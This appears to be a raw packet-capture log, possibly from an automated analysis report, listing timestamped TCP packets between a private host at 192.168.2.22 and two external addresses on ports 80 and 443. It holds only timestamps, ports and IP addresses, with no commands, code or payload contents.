                                                                                            Sep 27, 2024 14:00:12.878830910 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.878849030 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.879489899 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.879504919 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.879519939 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.879534960 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.879549026 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.879565001 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.879584074 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.880444050 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.880460024 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.880475044 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.880489111 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.880502939 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.880521059 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.880537033 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.880548954 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.881351948 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.881416082 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.952701092 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.952805996 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.952826023 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.952868938 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.955435038 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.955504894 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.955667973 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.955701113 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.955730915 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.955749989 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.955916882 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.955951929 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.955986977 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.956001043 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.956334114 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.956398964 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.961258888 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.961318016 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.961411953 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.961446047 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.961467028 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.961652994 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.961858988 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.961922884 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.962096930 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.962131023 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.962162018 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.962166071 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.962183952 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.962224960 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.963010073 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.963044882 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.963076115 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.963079929 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.963092089 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.963129044 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.963723898 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.963758945 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.963784933 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.963792086 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.963812113 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.963829041 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.963841915 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.963877916 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.964690924 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.964726925 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.964756012 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.964761972 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.964772940 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.964809895 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.965364933 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.965398073 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.965429068 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.965431929 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.965449095 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.965464115 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.965471029 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.965511084 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.966202974 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.966238976 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.966267109 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.966273069 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.966289997 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.966309071 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.967219114 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.967255116 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.967287064 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.967288017 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.967295885 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.967334986 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.967848063 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.967881918 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.967916012 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.967916012 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.967936039 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.967952013 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.967967033 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.967998028 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.968496084 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.968529940 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.968554020 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.968564987 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.968575001 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.968600035 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.968614101 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.968648911 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.969621897 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.969655991 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.969683886 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.969688892 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.969701052 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.969724894 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.969738007 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.969758987 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.969774961 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.969805956 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.970293045 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.970328093 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.970357895 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.970360041 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.970376015 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.970396042 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.970411062 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.970443010 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.971319914 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.971354008 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.971388102 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.971400976 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.971404076 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.971447945 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.971451998 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.971487045 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.971503973 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.971534014 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.972037077 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.972070932 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.972100973 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.972104073 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.972116947 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.972138882 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.972155094 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.972187042 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.972883940 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.972917080 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.972943068 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.972949028 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.972965002 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.973067045 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.973088980 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.973102093 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.973112106 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.973150015 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.973779917 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.973815918 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.973845005 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.973850012 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.973860979 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.973885059 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.973900080 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.973932028 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.974566936 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.974632025 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.038486958 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.038561106 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.038567066 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.038579941 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.038614035 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.038634062 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.039184093 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.039201975 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.039237976 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.039257050 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.044135094 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.044188023 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.044279099 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.044291973 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.044327974 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.044344902 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.044608116 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.044620037 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.044631958 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.044646025 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.044666052 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.044681072 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.045447111 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.045458078 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.045469046 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.045480967 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.045490980 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.045504093 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.045505047 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.045527935 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.045548916 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.049699068 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.049772978 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.049817085 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.049829960 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.049870014 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.050096989 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.050149918 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.050265074 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.050277948 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.050290108 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.050301075 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.050321102 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.050338030 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.050941944 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.050954103 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.050965071 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.050976992 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:13.050997972 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:13.051016092 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:15.302143097 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:15.831486940 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:15.831583023 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:15.831666946 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:15.842802048 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:15.842835903 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.434621096 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.434767008 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:16.519588947 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:16.519618988 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.520860910 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.675571918 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:16.723397970 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.921334028 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.921364069 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.921370029 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.921399117 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.921416044 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.921423912 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.921439886 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:16.921530008 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.921575069 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:16.921575069 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:16.921624899 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:16.922183037 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:16.944083929 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.944093943 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.944113970 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.944119930 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.944169998 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:16.944217920 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.944250107 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:16.977454901 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:16.987173080 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.987205029 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.987247944 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:16.987247944 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:16.987277985 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.987297058 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:16.987329006 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:16.987341881 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.029635906 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.029705048 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.029766083 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.029783964 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.029794931 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.031944990 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.032006979 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.032021046 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.032057047 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.032094002 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.034346104 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.034404039 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.034418106 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.034442902 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.034490108 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.034497023 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.094614983 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.094681978 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.094695091 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.094723940 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.094748974 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.094770908 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.095079899 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.116235971 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.116302013 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.116308928 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.116354942 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.116385937 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.118489027 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.118558884 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.118573904 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.118591070 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.118628025 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.121068001 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.121135950 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.121146917 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.121189117 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.121222973 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.123656988 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.123722076 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.123728991 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.123753071 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.123795986 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.123840094 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.126138926 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.126204014 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.126214981 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.126233101 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.126266003 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.139306068 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.139379025 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.139452934 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.139453888 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.139475107 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.181663990 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.181685925 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.181729078 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.181750059 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.181777954 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.183320045 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.183804035 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.183830976 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.183864117 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.183882952 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.183908939 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.184262037 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.202858925 CEST44349162207.241.227.96192.168.2.22
